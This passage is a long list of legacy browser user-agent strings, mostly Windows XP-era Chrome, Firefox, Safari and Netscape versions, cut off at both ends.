Chrome/2.0.172.0 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.42 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.8 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.0 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.1 Safari/530.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.178.0 Safari/530.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.191.0 Safari/531.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/3.0.191.3 Safari/531.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.17 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.20 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.24 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.201.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML,like Gecko) Chrome/3.0.195.27 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.0 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.4 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.0 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.7 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.3 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.4 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.288.1 Safari/532.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.2 Safari/533.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.353.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.355.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.356.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.357.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.8 (KHTML, like Gecko) Chrome/6.0.397.0 Safari/533.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.548.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.599.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.602.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.18 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.19 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.682.0 Safari/534.21 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.53 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.9 (KHTML, like Gecko) Chrome/7.0.531.0 Safari/534.9 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050519 Netscape/8.0.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060516 SeaMonkey/1.0.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 SeaMonkey/1.0.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20060918 Firefox/2.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061003 Firefox/2.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060527 BonEcho/2.0a3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b1) Gecko/20060708 Firefox/2.0b1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6pre) Gecko/2008121605 Firefox/3.0.6pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6pre) Gecko/2009011606 Firefox/3.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.0 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.11 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 AskTbPLTV5/3.8.0.12304 Firefox/3.5.16 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729) FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b3pre) Gecko/20090213 Firefox/3.0.1b3pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090409 Firefox/3.5b4pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b5pre) Gecko/20090517 Firefox/3.5b4pre (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.0.16 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b1) Gecko/2007110703 Firefox/3.0b1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b4pre) Gecko/2008020708 Firefox/3.0b4pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008030706 Firefox/3.0b5pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fa; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fi-FI) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-be; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729; .NET4.0E) -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB7.0 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; lt; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 GTB6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E) -Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100503 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 